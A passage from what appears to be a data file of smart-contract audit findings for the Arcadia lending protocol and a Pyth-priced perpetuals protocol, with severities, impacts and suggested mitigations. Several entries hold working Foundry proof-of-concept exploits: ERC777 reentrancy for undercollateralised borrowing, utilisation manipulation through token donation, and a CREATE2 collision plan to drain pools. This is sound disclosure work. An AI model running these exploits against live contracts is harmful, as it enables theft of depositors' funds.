uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log(""Collateral value of account:"", finalCollateralValue);\\n console.log(""Actual liquidity in position"", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature(""onERC721Received(address,address,uint256,bytes)""));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.","There are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.","High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.","```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n" +Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`,medium,"Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\n","Adjust the `assetState[asset].lastRewardGlobal` correctly or since every action (mint(), `burn()`, `increaseLiquidity()`, `decreaseliquidity()`, claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\n","Users will not be able to take any action on their positions until `currentRewardGlobal` is greater or equal to `assetState_.lastRewardGlobal`. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.",```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n +`CREATE2` address collision against an Account will allow complete draining of lending pools,medium,"The factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.","The mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:\\nDo not allow a user-supplied `salt`, as well as do not use the user address as a determining factor for the `salt`.\\nUse the vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is determined by `msg.sender` (the factory), and the internal `nonce` of the factory (for a contract, this is just ""how many other contracts it has deployed"" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.","Complete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. The cost of the attack may be offsetted with longer brute force time.\\nFor a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.","```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n" +Utilisation Can Be Manipulated Far Above 100%,medium,"The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the `transfer` of tokens will revert due to not enough tokens in the `Lending pool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in a incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grows to over100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.\\nNote that the 1e18 assets ""donated"" to the protocol are not lost. They can simply be all borrowed into an attackers account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, ""initial pool balance. This is also the amount deposited into tranche"");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log(""warp 2 minutes into future"");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log(""mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack"");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, ""shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!"");\\n\\n\\n }\\n```\\n",Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.,An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.,```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n +`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access control,medium,"When refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the `flashaction` should originate from there. This will cause the call to revert, making it impossible to refinance across `lendingPools`.",`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditor,Refinancing is impossible,"```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n" +Malicious keepers can manipulate the price when executing an order,high,"Malicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. In addition, the contest page mentioned that ""an offchain price that is pulled by the keeper and pushed onchain at time of any order execution"".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n // Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}("""");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper is permissionless, thus anyone can be a keeper and execute order on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to a higher price of $1000. When the latest price of $950 gets updated, the longer position will immediately incur a loss of $50. Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses an up-to-date price stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` 